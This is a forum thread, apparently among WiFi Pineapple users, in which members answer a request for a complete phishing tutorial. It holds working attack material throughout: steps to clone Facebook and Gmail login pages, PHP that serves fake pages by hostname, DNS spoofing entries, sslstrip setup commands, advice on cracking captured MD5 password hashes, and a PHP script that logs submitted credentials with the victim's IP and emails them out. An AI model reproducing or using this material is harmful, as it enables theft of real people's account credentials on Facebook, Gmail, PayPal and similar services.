Jump to content

Ask** Phishing Tut


Recommended Posts

Hi

can anyone send Detailed Phishing Tutorial showing how to set Phishing Page ,how to install it and how to run it so that it will phish the login details of the pre defined sites and release all the rest .

i have looked all around this forum but did not find A to Z Tutorial

Link to post
Share on other sites

Ok, I'll give it a try, just to test my (non-existing) skill of writing guides :)

In my example I'm going to use Chrome as browser, Notepadd++ as editor, Winscp as filetransfer to the Pineapple and facebook as my target.

Otherwise all my pineapple configurations are standard, and I'm using USB storage and symlink to the www folder.

Copy, and edit your site

1. Visit the site you would like to duplicate, like facebook.com in Incognito-mode(ctrl+shift+n)

2. Right-click somewhere on the page and choose "Save as.." and choose to save the Complete page to a folder you remember.

3. You should now have both "facebook.htm", and a folder named "facebook_files"

4. Right-click "facebook.htm" and choose to "Edit with Notepad++"

5. In Notepadd++ hit ctrl+f and enter "action" in the searchbox.

6. You will then find a line that says

action="https://www.facebook.com/login.php?login_attempt=1"[/CODE]

7. Change the line into

[CODE]action="error.php"[/CODE]

8. Simply save the page.

[b]Transfer the edited Site[/b]

1. The first time you start Winscp it will ask you for some details to make a new Session, so just enter the following information

[CODE]
Host name=172.16.42.1
User name=root
Password=pineapplesareyummy[/CODE]

And change the File Protocol to SCP. Now, to skip this step the next time you could save this information for later. It also asks you if you will ike to save the password, but it's recommended you don't.

2. Hit Login and enter the pineapples password if needed.

3. You might get 2 errors, but this is fine, just hit OK. (error looking up user groups and error getting name of remote directory)

4. When connected to the pineapple you will see 2 spaces, the one to the left is your local computer, and the right is the pineapple.

5. Browse to the folder on your computer where you saved the edited facebook.htm+facebook_files folder, and on the pineapple browse to the /usb/ folder.

6. Make a new folder in the pineapple called phish i.e. /usb/phish/

7. Copy your facebook.htm+facebook_files to /usb/phish on the pineapple.

[b]Symlink the .htm files to /www/[/b]

1. Browse to the pineapples gui 172.16.42.1/pineapple and login.

2. In the Advanced tab you enter

[CODE]ln -s /usb/phish/* /www/[/CODE]

3. Now if you enter 172.16.42.1/facebook.htm in your browser a page similar to facebook.com should appear, if not check that you didn't miss any steps.

From this step there is a bit different ways to achieve different results. If you would like the url in your browser to look like the real deal, then follow my next guideline, otherwise I guess you would be fine with jumping to the DNS Spoof section. This would leave the /www/index.php in the original state.

[b]Make the URL look real[/b]

To make the URL appear like the real one we have to edit/create a new index.php file that already exist in the Pineapples /www/ folder. Since I'm allready connected to the pineapple with Winscp, I'm using the editor in Wincsp for this, but you could of course use ssh, and edit with nano or anything similar.

Every steps is performed in Winscp and in the /www/ folder

1. Rightclick and Rename the index.php into something like indexOLD.php just to have a copy of the original.

2. Rightclick in a white space and create a new file and name it index.php

3. In the editor that appears you paste the following code:

[CODE]
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$skipInclude = 0;
if (strpos($ref, "facebook")) { $phishFile = "facebook.htm";
} elseif (strpos($ref, "example")) { $phishFile = "example.htm";
} elseif (strpos($ref, "tricks")) { $phishFile = "tricks.htm";
} elseif (strpos($ref, "noname")) { $phishFile = "noname.htm";
} elseif (strpos($ref, "dork")) { $phishFile = "dork.htm";
} else { require('redirect.php');
$skipInclude = 1;
}
if ($skipInclude == 0) {
include($phishFile);
}
?>[/CODE]

4. Of course, you don't need the example, tricks, noname, and dork, but this is just to illustrate how you could do with additional sites.

5. When done editing index.php save the file.

[b]Spoof DNS[/b]

This last step is done in the pineapples GUI 172.16,42,1/pineapple

1. In the Configuration tab you can edit the "DNS Spoof Config"

2. Enter sites you would like to spoof like in this example.

[CODE]
172.16.42.1 *.facebook.com
172.16.42.1 example.com
172.16.42.1 tricks.com
172.16.42.1 noname.com
172.16.42.1 dork.com[/CODE]

3. Hit Update spoofhost

4. In the Statuspage hit Start next to DNS Spoof

Now, one thing to remember is that you will of course have to be connected to the pineapple for this to work, and that you might have to clear your cache before the DNS resolves to the pineapple.

If you are in Windows fire up commandline and enter ipconfig /flushdns and try to ping faceook.com. If everything is ok you should get reply from 172.16.42.1.

Test that it works by entering facebook.com in your browser an try to enter anything in username/pass. If everything works as expected you should be able to see what you entered in the Logs page if you have a fairly new flash, otherwise you can check the file /www/pineapple/logs/phish.log

And last but not least, All this is information that I have gathered around the forums, so none of this is my work. Credits goes to several users on the forums that have shared information!

That said, I'm hoping that if I have forgotten anything, or have misled anyone I'm hoping you could correct this for me, since I'm not the best writer out there.

Link to post
Share on other sites

Ok, I'll give it a try, just to test my (non-existing) skill of writing guides :)

This is excellent! I've had my Pineapple quite some time, I haven't even used it yet (too much work and no play), but thanks to your response, I'm putting some time aside this evening to play around.

Very clear and concise :) It's greatly appreciated!

Link to post
Share on other sites

Well, I just tested ssl strip, and it found what I'm interested in out of the box.

But I think you should run only sslstrip, and not i.e. dns spoof simultanious at the same time.

Fire up sslstrip, and connect a test maschine to the Pineapple and enter a couple of sites with login and enter som text. You should find username, and password or a md5 hash of the password. If you get the md5 hash just use an online md5 decrypter, and voilla!

But did you want anything else with sslstrip?

Edit;

However, would there be a way you could cleanup the sslstrip log a little bit? I can see that different pages uses different techniques for username/password, but if one could somehow clean it up a little bit. Like showing only lines that contain username/password?

Maybe a little bit off-topic for this thread...

Edited by loozr
Link to post
Share on other sites

so you're telling me I should just load sslstrip on the pine from the pineapple site, and play with it. see how it works, and them move on from there?

you can ssh into the pineapple and install


opkg update
opkg --dest usb install sslstrip
ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7
touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py
[/CODE]

instructions for running can be found here http://www.thoughtcr...tware/sslstrip/

don't worry about arpspoofing

Edited by petertfm
Link to post
Share on other sites

Hello i have been trying to make the dns spoofing and phishnet work on my my pineapple v2 mark3 firmware. The following link helped me the most http://cloud.wifipineapple.com/wiki/doku.php?id=guidednsspoofing . However i still cannot manage to see any logs in /www/pineapple/phish.log so the fishnet in the mark 3 (mark iii) is not displaying anything.

here is what i have done with no success in capturing logs in the phishnet:

http://pastebin.com/bypN7MSh

i can redirect the dns and spoof the url just no logs. can somebody please shed some light on this one?

Link to post
Share on other sites

Hello i have been trying to make the dns spoofing and phishnet work on my my pineapple v2 mark3 firmware. The following link helped me the most http://cloud.wifipin...ednsspoofing . However i still cannot manage to see any logs in /www/pineapple/phish.log so the fishnet in the mark 3 (mark iii) is not displaying anything.

here is what i have done with no success in capturing logs in the phishnet:

http://pastebin.com/bypN7MSh

i can redirect the dns and spoof the url just no logs. can somebody please shed some light on this one?

You might also have to edit the following line in your facebook.htm


name="email"
[/CODE]

Into

[CODE]
name="name"
[/CODE]

This is because your error.php is looking for 'name'

[CODE]
$nam = stripslashes($_POST['name']);
[/CODE]

Link to post
Share on other sites

You might also have to edit the following line in your facebook.htm


name="email"
[/CODE]

Into

[CODE]
name="name"
[/CODE]

This is because your error.php is looking for 'name'

[CODE]
$nam = stripslashes($_POST['name']);
[/CODE]

So can i do either/or ? like can i just edit my error.php to say

$nam = stripslashes($_POST['email']);

I will play with that then.

Thanks for the reply btw.

Edited by --nick--
Link to post
Share on other sites

So can i do either/or ? like can i just edit my error.php to say

$nam = stripslashes($_POST['email']);

I will play with that then.

Thanks for the reply btw.

Well, sure, I guess you can do that, but if you are going to use several phishingpages this should be consistent. For example if you are going to make twitter page, then you will have to edit that to equal the value you want the script to collect. Bad explanation but I'm hoping you get the point.

Link to post
Share on other sites

Well, sure, I guess you can do that, but if you are going to use several phishingpages this should be consistent. For example if you are going to make twitter page, then you will have to edit that to equal the value you want the script to collect. Bad explanation but I'm hoping you get the point.

Yes i understand your point. well if i edit the .html to name="name" it doesnt capture logs still but there are many name="email". So i guess i still need to find the right one in the .html file

Edited by --nick--
Link to post
Share on other sites

It's the following you are going to change.


<td><input class="inputtext" name="email" id="email" tabindex="1" type="text"></td><td><input class="inputtext" name="pass" id="pass" tabindex="2" type="password"></td>
[/CODE]

The first part is username, and the second part is password(which you can leave as is)

Result like this

[CODE]
<td><input class="inputtext" name="name" id="email" tabindex="1" type="text"></td><td><input class="inputtext" name="pass" id="pass" tabindex="2" type="password"></td>
[/CODE]

This should do the trick. And I would suggest that you should learn to read some code, and understand what is happening behind the scripts and in webpages. Just get a basic understanding. I have absolutely no education regarding coding, but I use my common sense and logic to try figure out what is happening. This is in my opinion what is most interesting with this. Hacking the script/pages to work like you want it to.

EDIT

Just have to say, this might be a little bit different in the different language verions of the facebookpage. I have only edited the Norwegian page. YMMV

Edited by loozr
Link to post
Share on other sites

I am attempting to do gmail and I am running into some problems...

I followed your guide exactly, changing action which now looks like this:


<form novalidate="" id="gaia_loginform" action="error.php">
[/CODE]

I then went and found the input type for username/password. Which looked like this:

[CODE]
<div class="email-div">
<label for="Email"><strong class="email-label">Username</strong></label>
<input type="email" spellcheck="false" name="Email" id="Email" value="">
</div>
<div class="passwd-div">
<label for="Passwd"><strong class="passwd-label">Password</strong></label>
<input type="password" name="Passwd" id="Passwd">
</div>
[/CODE]

and updated it to this:

[CODE]
<div class="email-div">
<label for="Email"><strong class="email-label">Username</strong></label>
<input type="text" spellcheck="false" name="name" id="name" value="">
</div>
<div class="passwd-div">
<label for="Passwd"><strong class="passwd-label">Password</strong></label>
<input type="password" name="pass" id="pass">
</div>[/CODE]

I'm assuming its some of the java script that is occuring later, but I am not sure how to work around it. Can someone take a crack at this and let me know what I'm missing here? Here is a copy of the entire gmail.html file. http://pastebin.com/ThRMP10g

Thanks guys!

Link to post
Share on other sites

The thing is that every site is different, and may work in different ways, so there is not one way to do all sites. I'm not sure how to get gmail to work, but if you find out, it would be nice if you could post here what you did, in case others are wondering about the same.

I guess the best guide to learn to phish, is to learn coding. I guess html, php and javascript would cover most sites.. Sorry I don't have a better answer for you.

Link to post
Share on other sites

I am attempting to do gmail and I am running into some problems...

I followed your guide exactly, changing action which now looks like this:


<form novalidate="" id="gaia_loginform" action="error.php">
[/CODE]

I then went and found the input type for username/password. Which looked like this:

[CODE]
<div class="email-div">
<label for="Email"><strong class="email-label">Username</strong></label>
<input type="email" spellcheck="false" name="Email" id="Email" value="">
</div>
<div class="passwd-div">
<label for="Passwd"><strong class="passwd-label">Password</strong></label>
<input type="password" name="Passwd" id="Passwd">
</div>
[/CODE]

and updated it to this:

[CODE]
<div class="email-div">
<label for="Email"><strong class="email-label">Username</strong></label>
<input type="text" spellcheck="false" name="name" id="name" value="">
</div>
<div class="passwd-div">
<label for="Passwd"><strong class="passwd-label">Password</strong></label>
<input type="password" name="pass" id="pass">
</div>[/CODE]

I'm assuming its some of the java script that is occuring later, but I am not sure how to work around it. Can someone take a crack at this and let me know what I'm missing here? Here is a copy of the entire gmail.html file. http://pastebin.com/ThRMP10g

Thanks guys!

I took a look at the gmail, and made it work. Only difference is that I used the Norwegian version of https://accounts.goo...erviceLoginAuth Its not the same as gmail, but it's pretty similar, and I think it might be the same way to do it.

Anywho, it seems you did quite right, but you shouldn't change the "id=" value. Only change the "name=" value. Otherwise I did the same as you.

EDIT

Just remember, it seems that both Chrome and Firefox is "hardcoded" with the address to gmail, so DNS spoof seems to not work.

Edited by loozr
Link to post
Share on other sites

I took a look at the gmail, and made it work. Only difference is that I used the Norwegian version of https://accounts.goo...erviceLoginAuth Its not the same as gmail, but it's pretty similar, and I think it might be the same way to do it.

Anywho, it seems you did quite right, but you shouldn't change the "id=" value. Only change the "name=" value. Otherwise I did the same as you.

EDIT

Just remember, it seems that both Chrome and Firefox is "hardcoded" with the address to gmail, so DNS spoof seems to not work.

Thanks for the feedback. After adjusting the id value everything worked as normal. Using your method I was able to do both gmail as well as doing a proof of concept for paypal.

The idea is, any site that uses HSTS (a small list found here: http://dev.chromium.org/sts) won't work against sslstrip. So if you're running sslstrip you might as well redirect those sites to a phishing clone.

I am not sure whats hard coded, and I haven't tried any of these sites beyone http://pineappleip/site.html

So no idea if they would work in the real world yet.

Link to post
Share on other sites

Thanks for the feedback. After adjusting the id value everything worked as normal. Using your method I was able to do both gmail as well as doing a proof of concept for paypal.

The idea is, any site that uses HSTS (a small list found here: http://dev.chromium.org/sts) won't work against sslstrip. So if you're running sslstrip you might as well redirect those sites to a phishing clone.

I am not sure whats hard coded, and I haven't tried any of these sites beyone http://pineappleip/site.html

So no idea if they would work in the real world yet.

Aha, thanks for pointing that out! I had no idea there was such a thing.. Only noticed some sites not loading through sslstrip.

Link to post
Share on other sites
  • 4 weeks later...

I would like to share my php page that logs the POST variables. I think its quite good for people who want instant alert for when someone triggers it.


&lt;?php
// This is the login.php script i use. It will log to a file AND email it to you so you can check it when ever. The file logging is a backup.
$email = "POST DATA\n---------------------------------\n";
function logger($value, $key)
{
        global $email;
        $email .= $key." = ".$value."\n\r";
}
//$file="/usb/log/phish.log";
$file="phish.log";
$time = date("F j, Y, g:i a");
//$basicdata = "IP: ".$_SERVER['REMOTE_ADDR']." logged in at ".$time."";
$basicdata = "IP: [snip] logged in at ".$time."";
header ('Location: '.$file);
$handle = fopen($file, "a");
fwrite($handle, $basicdata);
fwrite($handle, "\r\n");
foreach($_POST as $variable =&gt; $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);

/*
-----------------EMAIL----------------
*/

array_walk($_POST, "logger");;
$headers = "From: Phishing &lt;Phishing@wifipineappleattack.comet&gt;\r\n";
$headers .= "Organization: CHANGE ME!!!\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/plain; charset=iso-8859-1\r\n";
$headers .= "X-Priority: 3\r\n";
$headers .= "X-Mailer: PHP".phpversion()."\r\n";
mail("email@email.com", "IP: ".$_SERVER['REMOTE_ADDR']." logged in at ".$time.".", $email, $headers);
exit;
?&gt;

Link to post
Share on other sites
  • 2 weeks later...

Hey i have searched the site but i can find a piece of cod that you put at the bottom of you index.php page to not show the folder path in you phishing page if anybody could point me in the right direction i would appreciate it. I need it for a class that i am showing how ease it is to phish people.

Edited by mreidiv
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...